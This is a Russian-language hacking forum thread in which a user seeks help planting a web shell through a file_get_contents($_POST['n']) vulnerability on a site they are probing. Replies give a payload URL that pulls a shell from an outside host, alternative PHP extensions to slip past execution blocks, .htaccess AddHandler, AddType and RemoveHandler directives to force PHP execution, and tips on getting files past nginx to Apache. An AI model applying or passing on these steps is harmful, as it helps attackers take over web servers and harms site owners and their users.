PDA

Просмотр полной версии : Помогите залить шел


user0
03.04.2016, 10:07
На изучаемом сайте найдена уязвимость:

file_get_contents($_POST['n'])

можно ли как-то залить шел или выполнить sql запрос?

Спасибо.

boool
16.08.2016, 12:18
Например вот так:

site/?n=http://exec.site/shell.php

в shell.php

eastpearldxb
24.11.2017, 21:43
Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить

Gorev
24.11.2017, 22:52
php2,php3,php5,phtml,shtml

eastpearldxb
24.11.2017, 23:32
↑ (https://antichat.live/posts/4153127/)
php2,php3,php5,phtml,shtml


Не работает, может туда как нибудь .htaccess залить?

Gorev
24.11.2017, 23:34
ну если там есть .htaccess, то не зальешь, а в другую папку?

eastpearldxb
25.11.2017, 11:44
↑ (https://antichat.live/posts/4153146/)
ну если там есть .htaccess, то не зальешь, а в другую папку?


Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?

Gorev
25.11.2017, 11:45
в другую папку пробуй залить шелл

eastpearldxb
25.11.2017, 11:56
↑ (https://antichat.live/posts/4153272/)
в другую папку пробуй залить шелл


Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам

gena ryzhov
25.11.2017, 14:01
↑ (https://antichat.live/posts/4153277/)
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам


В Гугле: addhandler htaccess

AddHandler application/x-httpd-php .расширение

AddType application/x-httpd-php .php . расширение

t0ma5
25.11.2017, 14:24
gena ryzhov said:
↑ (https://antichat.live/posts/4153334/)
В Гугле: addhandler htaccess
AddHandler application/x-httpd-php .расширение
AddType application/x-httpd-php .php . расширение


RemoveHandler желательно сначала делать, чтоб поменьше коллизий было

gena ryzhov
25.11.2017, 14:33
↑ (https://antichat.live/posts/4153277/)
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам


Но если перед апачем стоит nginx то нужно расширение файла которое nginx пропустит к апачу)

t0ma5
25.11.2017, 14:39
gena ryzhov said:
↑ (https://antichat.live/posts/4153357/)
Но если перед апачем стоит nginx то нужно расширение файла которое nginx пропустит к апачу)


можно воспользоваться методом [тут цензура] , для обхода кеширования сеошники добавляют такие веши app.css?v=12345 , такой запрос долетит до апача

хотя в целом ситуация очень редкая, расширение файла которое подхватывается nginx'ом и выполняется на бекенде..